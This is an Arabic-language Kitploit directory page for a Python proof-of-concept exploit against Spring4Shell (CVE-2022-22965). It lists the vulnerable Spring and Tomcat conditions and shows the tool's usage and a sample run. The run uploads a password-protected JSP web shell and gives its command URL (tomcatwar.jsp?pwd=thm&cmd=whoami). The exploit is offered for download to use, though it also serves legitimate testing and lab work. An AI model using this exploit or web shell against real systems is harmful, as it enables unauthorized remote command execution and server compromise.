Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Spring4Shell-CVE-2022-22965 — أداة استغلال (PoC) مبنية على بايثون لـ CVE-2022-22965 (Spring4Shell) تستهدف ثغرة تنفيذ الأوامر عن بُعد (RCE) في Java Spring Core على Apache Tomcat. تقوم بتحميل ويب شيل JSP مع حماية بكلمة مرور لتنفيذ الأوامر عن بُعد. | Kitploit
أدوات/GitHubGitHub/sohamsharma966/spring4shell-cve-2022-22965
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsohamsharma966/spring4shell-cve-2022-22965

Spring4Shell-CVE-2022-22965

أداة استغلال (PoC) مبنية على بايثون لـ CVE-2022-22965 (Spring4Shell) تستهدف ثغرة تنفيذ الأوامر عن بُعد (RCE) في Java Spring Core على Apache Tomcat. تقوم بتحميل ويب شيل JSP مع حماية بكلمة مرور لتنفيذ الأوامر عن بُعد.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد
مشاركة

Spring4Shell: CVE-2022-22965 RCE

ثغرة RCE في إطار عمل Java Spring

تؤثر هذه الثغرات على مكون "Spring Core" — قلب الإطار

الشروط الحالية للثغرة:-

  • JDK 9+
  • إصدار ضعيف من Spring Framework (<5.2 | 5.2.0-19 | 5.3.0-17)
  • Apache Tomcat كخادم لتطبيق Spring، معبأ كملف WAR
  • اعتماد على مكونات spring-webmvc و/أو spring-webflux من إطار Spring Framework

الاستغلال

root@kitploit:~
user@attacker:~$ ./exploit.py --help
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)
root@kitploit:~
user@attacker:~$ ./exploit.py http://MACHINE_IP/
Shell Uploaded Successfully!


# OUTPUT= Your shell can be found at: http://MACHINE_IP/tomcatwar.jsp?pwd=thm&cmd=whoami
تنزيل الأداة